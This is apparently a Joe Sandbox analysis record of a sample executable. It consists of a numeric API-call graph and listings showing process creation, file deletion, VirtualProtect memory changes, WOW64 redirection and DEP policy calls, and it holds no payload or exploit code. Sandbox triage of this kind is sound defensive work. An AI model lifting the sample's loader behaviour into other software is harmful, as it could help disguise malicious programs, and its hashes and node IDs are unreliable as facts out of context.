18 API calls 5627->5628 5628->5625 5628->5626 5628->5627 5632 405318 5628->5632 5629 40520c 19 API calls 5629->5632 5630 4031e8 18 API calls 5630->5632 5631 404cdc 19 API calls 5631->5632 5632->5629 5632->5630 5632->5631 5633 40539b 5632->5633 5634 4031b8 4 API calls 5633->5634 5635 4053b5 5634->5635 5636 4053c4 GetSystemDefaultLCID 5635->5636 5693 40520c GetLocaleInfoA 5636->5693 5639 4031e8 18 API calls 5640 405404 5639->5640 5641 40520c 19 API calls 5640->5641 5642 405419 5641->5642 5643 40520c 19 API calls 5642->5643 5644 40543d 5643->5644 5699 405258 GetLocaleInfoA 5644->5699 5647 405258 GetLocaleInfoA 5648 40546d 5647->5648 5649 40520c 19 API calls 5648->5649 5650 405487 5649->5650 5651 405258 GetLocaleInfoA 5650->5651 5652 4054a4 5651->5652 5653 40520c 19 API calls 5652->5653 5654 4054be 5653->5654 5655 4031e8 18 API calls 5654->5655 5656 4054cb 5655->5656 5657 40520c 19 API calls 5656->5657 5658 4054e0 5657->5658 5659 4031e8 18 API calls 5658->5659 5660 4054ed 5659->5660 5661 405258 GetLocaleInfoA 5660->5661 5662 4054fb 5661->5662 5663 40520c 19 API calls 5662->5663 5664 405515 5663->5664 5665 4031e8 18 API calls 5664->5665 5666 405522 5665->5666 5667 40520c 19 API calls 5666->5667 5668 405537 5667->5668 5669 4031e8 18 API calls 5668->5669 5670 405544 5669->5670 5671 40520c 19 API calls 5670->5671 5672 405559 5671->5672 5673 405576 5672->5673 5674 405567 5672->5674 5676 40322c 4 API calls 5673->5676 5701 40322c 5674->5701 5677 405574 5676->5677 5678 40520c 19 API calls 5677->5678 5679 405598 5678->5679 5680 4055b5 5679->5680 5681 4055a6 5679->5681 5683 403198 4 API calls 5680->5683 5682 40322c 4 API calls 5681->5682 5684 4055b3 5682->5684 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055d7 5685->5686 5687 4033b4 18 API calls 5686->5687 5688 4055f1 5687->5688 5689 4031b8 4 API calls 5688->5689 5690 40560b 5689->5690 5691 405cf4 GetVersionExA 5690->5691 5692 405d0b 5691->5692 5692->5461 5694 405233 5693->5694 5695 405245 5693->5695 5696 403278 18 API calls 5694->5696 5697 40322c 4 API calls 5695->5697 5698 405243 5696->5698 5697->5698 5698->5639 5700 405274 5699->5700 5700->5647 5703 403230 5701->5703 5702 403252 5702->5677 5703->5702 5704 4025ac 4 API calls 5703->5704 5704->5702 5709 403414 5705->5709 5708 406fee 5708->5521 5710 403418 LoadLibraryA 5709->5710 5710->5708 5712 406af0 18 API calls 5711->5712 5713 406bf3 5712->5713 5714 406c05 5713->5714 5715 406af0 18 API calls 5713->5715 5716 403198 4 API calls 5714->5716 5715->5713 5717 406c1a 5716->5717 5717->5538 5719 407578 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5555 5722 403414 5721->5722 5723 4075b7 CreateFileA 5722->5723 5723->5555 5725 407cd3 5724->5725 5729 407cc8 5724->5729 5730 407c5c 5725->5730 5728 405890 18 API calls 5728->5729 5729->5590 5731 407c70 5730->5731 5732 407caf 5730->5732 5731->5732 5734 407bac 5731->5734 5732->5728 5732->5729 5735 407bb7 5734->5735 5736 407bc8 5734->5736 5737 405890 18 API calls 5735->5737 5738 4074a0 34 API calls 5736->5738 5737->5736 5739 407bdc 5738->5739 5740 4074a0 34 API calls 5739->5740 5741 407bfd 5740->5741 5742 407918 InterlockedExchange 5741->5742 5743 407c12 5742->5743 5744 407c28 5743->5744 5745 405890 18 API calls 5743->5745 5744->5731 5745->5744 5747 402598 5746->5747 5749 4025a2 5746->5749 5752 401fd4 5747->5752 5748 40259e 5748->5749 5750 403154 4 API calls 5748->5750 5749->5619 5749->5749 5750->5749 5753 401fe8 5752->5753 5754 401fed 5752->5754 5763 401918 RtlInitializeCriticalSection 5753->5763 5756 402012 RtlEnterCriticalSection 5754->5756 5757 40201c 5754->5757 5762 401ff1 5754->5762 5756->5757 5757->5762 5770 401ee0 5757->5770 5760 402147 5760->5748 5761 40213d RtlLeaveCriticalSection 5761->5760 5762->5748 5764 40193c RtlEnterCriticalSection 5763->5764 5765 401946 5763->5765 5764->5765 5766 401964 LocalAlloc 5765->5766 5767 40197e 5766->5767 5768 4019c3 RtlLeaveCriticalSection 5767->5768 5769 4019cd 5767->5769 5768->5769 5769->5754 5773 401ef0 5770->5773 5771 401f1c 5775 401f40 5771->5775 5781 401d00 5771->5781 5773->5771 5773->5775 5776 401e58 5773->5776 5775->5760 5775->5761 5785 4016d8 5776->5785 5779 401e75 5779->5773 5782 401d4e 5781->5782 5783 401d1e 5781->5783 5782->5783 5854 401c68 5782->5854 5783->5775 5788 4016f4 5785->5788 5787 4016fe 5810 4015c4 5787->5810 5788->5787 5790 40175b 5788->5790 5793 40174f 5788->5793 5802 401430 5788->5802 5814 40132c 5788->5814 5790->5779 5795 401dcc 5790->5795 5792 40170a 5792->5790 5818 40150c 5793->5818 5828 401d80 5795->5828 5798 40132c LocalAlloc 5800 401df0 5798->5800 5799 401df8 5799->5779 5800->5799 5832 401b44 5800->5832 5803 40143f VirtualAlloc 5802->5803 5805 40146c 5803->5805 5806 40148f 5803->5806 5822 4012e4 5805->5822 5806->5788 5809 40147c VirtualFree 5809->5806 5812 40160a 5810->5812 5811 40163a 5811->5792 5812->5811 5813 401626 VirtualAlloc 5812->5813 5813->5811 5813->5812 5815 401348 5814->5815 5816 4012e4 LocalAlloc 5815->5816 5817 40138f 5816->5817 5817->5788 5821 40153b 5818->5821 5819 401594 5819->5790 5820 401568 VirtualFree 5820->5821 5821->5819 5821->5820 5825 40128c 5822->5825 5826 401298 LocalAlloc 5825->5826 5827 4012aa 5825->5827 5826->5827 5827->5806 5827->5809 5829 401d92 5828->5829 5830 401d89 5828->5830 5829->5798 5830->5829 5837 401b74 5830->5837 5833 401b61 5832->5833 5834 401b52 5832->5834 5833->5799 5835 401d00 9 API calls 5834->5835 5836 401b5f 5835->5836 5836->5799 5840 40215c 5837->5840 5839 401b95 5839->5829 5841 40217a 5840->5841 5842 402175 5840->5842 5844 4021ab RtlEnterCriticalSection 5841->5844 5847 40217e 5841->5847 5852 4021b5 5841->5852 5843 401918 4 API calls 5842->5843 5843->5841 5844->5852 5845 402244 5845->5847 5850 401d80 7 API calls 5845->5850 5846 4021c1 5848 4022e3 RtlLeaveCriticalSection 5846->5848 5849 4022ed 5846->5849 5847->5839 5848->5849 5849->5839 5850->5847 5851 402270 5851->5846 5853 401d00 7 API calls 5851->5853 5852->5845 5852->5846 5852->5851 5853->5846 5855 401c7a 5854->5855 5856 401c9d 5855->5856 5857 401caf 5855->5857 5867 40188c 5856->5867 5859 40188c 3 API calls 5857->5859 5860 401cad 5859->5860 5861 401b44 9 API calls 5860->5861 5866 401cc5 5860->5866 5862 401cd4 5861->5862 5863 401cee 5862->5863 5877 401b98 5862->5877 5882 4013a0 5863->5882 5866->5783 5868 4018b2 5867->5868 5876 40190b 5867->5876 5886 401658 5868->5886 5871 40132c LocalAlloc 5872 4018cf 5871->5872 5873 40150c VirtualFree 5872->5873 5874 4018e6 5872->5874 5873->5874 5875 4013a0 LocalAlloc 5874->5875 5874->5876 5875->5876 5876->5860 5878 401bab 5877->5878 5879 401b9d 5877->5879 5878->5863 5880 401b74 9 API calls 5879->5880 5881 401baa 5880->5881 5881->5863 5883 4013ab 5882->5883 5884 4013c6 5883->5884 5885 4012e4 LocalAlloc 5883->5885 5884->5866 5885->5884 5888 40168f 5886->5888 5887 4016cf 5887->5871 5888->5887 5889 4016a9 VirtualFree 5888->5889 5889->5888 6846 402dfa 6847 402e0d 6846->6847 6849 402e26 6846->6849 6850 402ba4 6847->6850 6851 402bc9 6850->6851 6852 402bad 6850->6852 6851->6849 6853 402bb5 RaiseException 6852->6853 6853->6851 6854 4075fa GetFileSize 6855 407626 6854->6855 6856 407616 GetLastError 6854->6856 6856->6855 6857 40761f 6856->6857 6858 40748c 35 API calls 6857->6858 6858->6855 6859 406ffb 6860 407008 SetErrorMode 6859->6860 6528 403a80 CloseHandle 6529 403a90 6528->6529 6530 403a91 GetLastError 6528->6530 6531 404283 6532 4042c3 6531->6532 6533 403154 4 API calls 6532->6533 6534 404323 6533->6534 6861 404185 6862 4041ff 6861->6862 6863 4041cc 6862->6863 6864 403154 4 API calls 6862->6864 6865 404323 6864->6865 6535 403e87 6536 403e4c 6535->6536 6537 403e62 6536->6537 6538 403e7b 6536->6538 6541 403e67 6536->6541 6544 403cc8 6537->6544 6539 402674 4 API calls 6538->6539 6542 403e78 6539->6542 6541->6542 6548 402674 6541->6548 6545 403cd6 6544->6545 6546 402674 4 API calls 6545->6546 6547 403ceb 6545->6547 6546->6547 6547->6541 6549 403154 4 API calls 6548->6549 6550 40267a 6549->6550 6550->6542 6559 407e90 6560 407eb8 VirtualFree 6559->6560 6561 407e9d 6560->6561 6564 403e95 6565 403e4c 6564->6565 6566 403e62 6565->6566 6567 403e7b 6565->6567 6570 403e67 6565->6570 6569 403cc8 4 API calls 6566->6569 6568 402674 4 API calls 6567->6568 6571 403e78 6568->6571 6569->6570 6570->6571 6572 402674 4 API calls 6570->6572 6572->6571 6573 40ac97 6582 4096fc 6573->6582 6576 402f24 5 API calls 6577 40aca1 6576->6577 6578 403198 4 API calls 6577->6578 6579 40acc0 6578->6579 6580 403198 4 API calls 6579->6580 6581 40acc8 6580->6581 6591 4056ac 6582->6591 6584 409745 6587 403198 4 API calls 6584->6587 6585 409717 6585->6584 6597 40720c 6585->6597 6589 40975a 6587->6589 6588 409735 6590 40973d MessageBoxA 6588->6590 6589->6576 6589->6577 6590->6584 6592 403154 4 API calls 6591->6592 6594 4056b1 6592->6594 6593 4056c9 6593->6585 6594->6593 6595 403154 4 API calls 6594->6595 6596 4056bf 6595->6596 6596->6585 6598 4056ac 4 API calls 6597->6598 6599 40721b 6598->6599 6600 407221 6599->6600 6603 40722f 6599->6603 6601 40322c 4 API calls 6600->6601 6602 40722d 6601->6602 6602->6588 6604 40724b 6603->6604 6605 40723f 6603->6605 6615 4032b8 6604->6615 6608 4071d0 6605->6608 6609 40322c 4 API calls 6608->6609 6610 4071df 6609->6610 6611 4071fc 6610->6611 6612 406950 CharPrevA 6610->6612 6611->6602 6613 4071eb 6612->6613 6613->6611 6614 4032fc 18 API calls 6613->6614 6614->6611 6616 403278 18 API calls 6615->6616 6617 4032c2 6616->6617 6617->6602 6618 403a97 6619 403aac 6618->6619 6620 403ab2 6619->6620 6621 403bbc GetStdHandle 6619->6621 6622 403b0e CreateFileA 6619->6622 6623 403c17 GetLastError 6621->6623 6635 403bba 6621->6635 6622->6623 6624 403b2c 6622->6624 6623->6620 6625 403b3b GetFileSize 6624->6625 6624->6635 6625->6623 6627 403b4e SetFilePointer 6625->6627 6627->6623 6631 403b6a ReadFile 6627->6631 6628 403be7 GetFileType 6628->6620 6630 403c02 CloseHandle 6628->6630 6630->6620 6631->6623 6632 403b8c 6631->6632 6633 403b9f SetFilePointer 6632->6633 6632->6635 6633->6623 6634 403bb0 SetEndOfFile 6633->6634 6634->6623 6634->6635 6635->6620 6635->6628 6640 40aaa2 6641 40aad2 6640->6641 6642 40aadc CreateWindowExA SetWindowLongA 6641->6642 6643 405194 33 API calls 6642->6643 6644 40ab5f 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab6d 6645->6646 6647 4032fc 18 API calls 6646->6647 6648 40ab7a 6647->6648 6649 406b7c 19 API calls 6648->6649 6650 40ab86 6649->6650 6651 4032fc 18 API calls 6650->6651 6652 40ab8f 6651->6652 6653 4099ec 43 API calls 6652->6653 6654 40aba1 6653->6654 6655 4098cc 19 API calls 6654->6655 6656 40abb4 6654->6656 6655->6656 6657 40abed 6656->6657 6658 4094d8 9 API calls 6656->6658 6659 40ac06 6657->6659 6662 40ac00 RemoveDirectoryA 6657->6662 6658->6657 6660 40ac1a 6659->6660 6661 40ac0f DestroyWindow 6659->6661 6663 40ac42 6660->6663 6664 40357c 4 API calls 6660->6664 6661->6660 6662->6659 6665 40ac38 6664->6665 6666 4025ac 4 API calls 6665->6666 6666->6663 6878 405ba2 6880 405ba4 6878->6880 6879 405be0 6881 405940 19 API calls 6879->6881 6880->6879 6882 405bf7 6880->6882 6883 405bda 6880->6883 6891 405bf3 6881->6891 6886 404cdc 19 API calls 6882->6886 6883->6879 6884 405c4c 6883->6884 6885 4059b0 33 API calls 6884->6885 6885->6891 6887 405c20 6886->6887 6889 4059b0 33 API calls 6887->6889 6888 403198 4 API calls 6890 405c86 6888->6890 6889->6891 6891->6888 6892 408da4 6893 408dc8 6892->6893 6894 408c80 18 API calls 6893->6894 6895 408dd1 6894->6895 6667 402caa 6668 403154 4 API calls 6667->6668 6669 402caf 6668->6669 6910 4011aa 6911 4011ac GetStdHandle 6910->6911 6670 4028ac 6671 402594 18 API calls 6670->6671 6672 4028b6 6671->6672 4982 40aab4 4983 40aab8 SetLastError 4982->4983 5014 409648 GetLastError 4983->5014 4986 40aad2 4988 40aadc CreateWindowExA SetWindowLongA 4986->4988 5027 405194 4988->5027 4992 40ab6d 4993 4032fc 18 API calls 4992->4993 4994 40ab7a 4993->4994 5044 406b7c GetCommandLineA 4994->5044 4997 4032fc 18 API calls 4998 40ab8f 4997->4998 5049 4099ec 4998->5049 5000 40aba1 5002 40abb4 5000->5002 5070 4098cc 5000->5070 5003 40abd4 5002->5003 5004 40abed 5002->5004 5076 4094d8 5003->5076 5006 40ac06 5004->5006 5009 40ac00 RemoveDirectoryA 5004->5009 5007 40ac1a 5006->5007 5008 40ac0f DestroyWindow 5006->5008 5013 40ac42 5007->5013 5084 40357c 5007->5084 5008->5007 5009->5006 5011 40ac38 5097 4025ac 5011->5097 5101 404c94 5014->5101 5022 4096c3 5116 4031b8 5022->5116 5028 4051a8 33 API calls 5027->5028 5029 4051a3 5028->5029 5030 4032fc 5029->5030 5031 403300 5030->5031 5032 40333f 5030->5032 5033 4031e8 5031->5033 5034 40330a 5031->5034 5032->4992 5040 403254 18 API calls 5033->5040 5041 4031fc 5033->5041 5035 403334 5034->5035 5036 40331d 5034->5036 5037 4034f0 18 API calls 5035->5037 5277 4034f0 5036->5277 5043 403322 5037->5043 5038 403228 5038->4992 5040->5041 5041->5038 5042 4025ac 4 API calls 5041->5042 5042->5038 5043->4992 5303 406af0 5044->5303 5046 406ba1 5047 403198 4 API calls 5046->5047 5048 406bbf 5047->5048 5048->4997 5317 4033b4 5049->5317 5051 409a27 5052 409a59 CreateProcessA 5051->5052 5053 409a65 5052->5053 5054 409a6c CloseHandle 5052->5054 5056 409648 35 API calls 5053->5056 5055 409a75 5054->5055 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5055->5057 5056->5054 5058 409a7a MsgWaitForMultipleObjects 5057->5058 5058->5055 5059 409a91 5058->5059 5060 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5059->5060 5061 409a96 GetExitCodeProcess CloseHandle 5060->5061 5062 409ab6 5061->5062 5063 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5064 409abe 5063->5064 5064->5000 5065 402f24 5066 403154 4 API calls 5065->5066 5067 402f29 5066->5067 5323 402bcc 5067->5323 5069 402f51 5069->5069 5071 40990e 5070->5071 5072 4098d4 5070->5072 5071->5002 5072->5071 5073 403420 18 API calls 5072->5073 5074 409908 5073->5074 5326 408e80 5074->5326 5077 409532 5076->5077 5081 4094eb 5076->5081 5077->5004 5078 4094f3 Sleep 5078->5081 5079 409503 Sleep 5079->5081 5081->5077 5081->5078 5081->5079 5082 40951a GetLastError 5081->5082 5349 408fbc 5081->5349 5082->5077 5083 409524 GetLastError 5082->5083 5083->5077 5083->5081 5087 403591 5084->5087 5093 4035a0 5084->5093 5085 4035b1 5088 403198 4 API calls 5085->5088 5086 4035b8 5089 4031b8 4 API calls 5086->5089 5090 4035d0 5087->5090 5091 40359b 5087->5091 5092 4035b6 5087->5092 5088->5092 5089->5092 5090->5092 5095 40357c 4 API calls 5090->5095 5091->5093 5094 4035ec 5091->5094 5092->5011 5093->5085 5093->5086 5094->5092 5366 403554 5094->5366 5095->5090 5098 4025b0 5097->5098 5100 4025ba 5097->5100 5099 403154 4 API calls 5098->5099 5098->5100 5099->5100 5100->5013 5124 4051a8 5101->5124 5104 407284 FormatMessageA 5105 4072aa 5104->5105 5106 403278 18 API calls 5105->5106 5107 4072c7 5106->5107 5108 408da8 5107->5108 5109 408dc8 5108->5109 5267 408c80 5109->5267 5112 405890 5113 405897 5112->5113 5114 4031e8 18 API calls 5113->5114 5115 4058af 5114->5115 5115->5022 5118 4031be 5116->5118 5117 4031e3 5120 403198 5117->5120 5118->5117 5119 4025ac 4 API calls 5118->5119 5119->5118 5121 4031b7 5120->5121 5122 40319e 5120->5122 5121->4986 5121->5065 5122->5121 5123 4025ac 4 API calls 5122->5123 5123->5121 5125 4051c5 5124->5125 5132 404e58 5125->5132 5128 4051f1 5137 403278 5128->5137 5134 404e73 5132->5134 5133 404e85 5133->5128 5142 404be4 5133->5142 5134->5133 5145 404f7a 5134->5145 5152 404e4c 5134->5152 5138 403254 18 API calls 5137->5138 5139 403288 5138->5139 5140 403198 4 API calls 5139->5140 5141 4032a0 5140->5141 5141->5104 5259 405940 5142->5259 5144 404bf5 5144->5128 5146 404f8b 5145->5146 5150 404fd9 5145->5150 5149 40505f 5146->5149 5146->5150 5148 404ff7 5148->5134 5149->5148 5159 404e38 5149->5159 5150->5148 5155 404df4 5150->5155 5153 403198 4 API calls 5152->5153 5154 404e56 5153->5154 5154->5134 5156 404e02 5155->5156 5162 404bfc 5156->5162 5158 404e30 5158->5150 5189 4039a4 5159->5189 5165 4059b0 5162->5165 5164 404c15 5164->5158 5166 4059be 5165->5166 5175 404cdc LoadStringA 5166->5175 5169 405194 33 API calls 5170 4059f6 5169->5170 5178 4031e8 5170->5178 5173 4031b8 4 API calls 5174 405a1b 5173->5174 5174->5164 5176 403278 18 API calls 5175->5176 5177 404d09 5176->5177 5177->5169 5179 4031ec 5178->5179 5182 4031fc 5178->5182 5179->5182 5184 403254 5179->5184 5180 403228 5180->5173 5182->5180 5183 4025ac 4 API calls 5182->5183 5183->5180 5185 403274 5184->5185 5186 403258 5184->5186 5185->5182 5187 402594 18 API calls 5186->5187 5188 403261 5187->5188 5188->5182 5190 4039ab 5189->5190 5195 4038b4 5190->5195 5192 4039cb 5193 403198 4 API calls 5192->5193 5194 4039d2 5193->5194 5194->5148 5196 4038d5 5195->5196 5197 4038c8 5195->5197 5199 403934 5196->5199 5200 4038db 5196->5200 5223 403780 5197->5223 5201 403993 5199->5201 5202 40393b 5199->5202 5203 4038e1 5200->5203 5204 4038ee 5200->5204 5205 4037f4 3 API calls 5201->5205 5206 403941 5202->5206 5207 40394b 5202->5207 5230 403894 5203->5230 5210 403894 6 API calls 5204->5210 5208 4038d0 5205->5208 5245 403864 5206->5245 5213 4037f4 3 API calls 5207->5213 5208->5192 5211 4038fc 5210->5211 5235 4037f4 5211->5235 5215 40395d 5213->5215 5217 403864 23 API calls 5215->5217 5216 403917 5241 40374c 5216->5241 5218 403976 5217->5218 5220 40374c VariantClear 5218->5220 5222 40398b 5220->5222 5221 40392c 5221->5192 5222->5192 5224 4037f0 5223->5224 5229 403744 5223->5229 5224->5208 5225 403793 VariantClear 5225->5229 5226 4037ab 5226->5208 5227 4037dc VariantCopyInd 5227->5224 5227->5229 5228 403198 4 API calls 5228->5229 5229->5223 5229->5225 5229->5226 5229->5227 5229->5228 5250 4036b8 5230->5250 5233 40374c VariantClear 5234 4038a9 5233->5234 5234->5208 5236 403845 VariantChangeTypeEx 5235->5236 5237 40380a VariantChangeTypeEx 5235->5237 5240 403832 5236->5240 5238 403826 5237->5238 5239 40374c VariantClear 5238->5239 5239->5240 5240->5216 5242 403766 5241->5242 5243 403759 5241->5243 5242->5221 5243->5242 5244 403779 VariantClear 5243->5244 5244->5221 5256 40369c SysStringLen 5245->5256 5248 40374c VariantClear 5249 403882 5248->5249 5249->5208 5251 4036cb 5250->5251 5252 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5251->5252 5253 4036db 5251->5253 5254 40372e 5252->5254 5255 4036ed MultiByteToWideChar SysAllocStringLen 5253->5255 5254->5233 5255->5254 5257 403610 21 API calls 5256->5257 5258 4036b3 5257->5258 5258->5248 5260 40594c 5259->5260 5261 404cdc 19 API calls 5260->5261 5262 405972 5261->5262 5263 4031e8 18 API calls 5262->5263 5264 40597d 5263->5264 5265 403198 4 API calls 5264->5265 5266 405992 5265->5266 5266->5144 5268 403198 4 API calls 5267->5268 5270 408cb1 5267->5270 5268->5270 5269 4031b8 4 API calls 5271 408d69 5269->5271 5272 408cc8 5270->5272 5273 403278 18 API calls 5270->5273 5275 4032fc 18 API calls 5270->5275 5276 408cdc 5270->5276 5271->5112 5274 4032fc 18 API calls 5272->5274 5273->5270 5274->5276 5275->5270 5276->5269 5278 4034fd 5277->5278 5285 40352d 5277->5285 5280 403526 5278->5280 5283 403509 5278->5283 5279 403198 4 API calls 5282 403517 5279->5282 5281 403254 18 API calls 5280->5281 5281->5285 5282->5043 5286 4025c4 5283->5286 5285->5279 5287 4025ca 5286->5287 5288 4025dc 5287->5288 5290 403154 5287->5290 5288->5282 5288->5288 5291 403164 5290->5291 5292 40318c TlsGetValue 5290->5292 5291->5288 5293 403196 5292->5293 5294 40316f 5292->5294 5293->5288 5298 40310c 5294->5298 5296 403174 TlsGetValue 5297 403184 5296->5297 5297->5288 5299 403120 LocalAlloc 5298->5299 5300 403116 5298->5300 5301 40313e TlsSetValue 5299->5301 5302 403132 5299->5302 5300->5299 5301->5302 5302->5296 5304 406b1c 5303->5304 5305 403278 18 API calls 5304->5305 5306 406b29 5305->5306 5313 403420 5306->5313 5308 406b31 5309 4031e8 18 API calls 5308->5309 5310 406b49 5309->5310 5311 403198 4 API calls 5310->5311 5312 406b6b 5311->5312 5312->5046 5314 403426 5313->5314 5316 403437 5313->5316 5315 403254 18 API calls 5314->5315 5314->5316 5315->5316 5316->5308 5318 4033bc 5317->5318 5319 403254 18 API calls 5318->5319 5320 4033cf 5319->5320 5321 4031e8 18 API calls 5320->5321 5322 4033f7 5321->5322 5324 402bd5 RaiseException 5323->5324 5325 402be6 5323->5325 5324->5325 5325->5069 5327 408e8e 5326->5327 5329 408ea6 5327->5329 5339 408e18 5327->5339 5330 408e18 18 API calls 5329->5330 5331 408eca 5329->5331 5330->5331 5342 407918 5331->5342 5333 408ee5 5334 408e18 18 API calls 5333->5334 5336 408ef8 5333->5336 5334->5336 5335 408e18 18 API calls 5335->5336 5336->5335 5337 403278 18 API calls 5336->5337 5338 408f27 5336->5338 5337->5336 5338->5071 5340 405890 18 API calls 5339->5340 5341 408e29 5340->5341 5341->5329 5345 4078c4 5342->5345 5346 4078d6 5345->5346 5347 4078e7 5345->5347 5348 4078db InterlockedExchange 5346->5348 5347->5333 5348->5347 5357 408f70 5349->5357 5351 408fd6 5351->5081 5352 408fd2 5352->5351 5353 408ff2 DeleteFileA GetLastError 5352->5353 5354 409010 5353->5354 5363 408fac 5354->5363 5358 408f7a 5357->5358 5359 408f7e 5357->5359 5358->5352 5360 408fa0 SetLastError 5359->5360 5361 408f87 Wow64DisableWow64FsRedirection 5359->5361 5362 408f9b 5360->5362 5361->5362 5362->5352 5364 408fb1 Wow64RevertWow64FsRedirection 5363->5364 5365 408fbb 5363->5365 5364->5365 5365->5081 5367 403566 5366->5367 5369 403578 5367->5369 5370 403604 5367->5370 5369->5094 5371 40357c 5370->5371 5376 40359b 5371->5376 5377 4035b6 5371->5377 5378 4035d0 5371->5378 5379 4035a0 5371->5379 5372 4035b1 5374 403198 4 API calls 5372->5374 5373 4035b8 5375 4031b8 4 API calls 5373->5375 5374->5377 5375->5377 5376->5379 5380 4035ec 5376->5380 5377->5367 5378->5377 5381 40357c 4 API calls 5378->5381 5379->5372 5379->5373 5380->5377 5382 403554 4 API calls 5380->5382 5381->5378 5382->5380 6673 401ab9 6674 401a96 6673->6674 6675 401aa9 RtlDeleteCriticalSection 6674->6675 6676 401a9f RtlLeaveCriticalSection 6674->6676 6676->6675

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                    • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2441996862-0
                                                                                                    • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                    • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                    • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                    • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                    • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                    • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                    • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
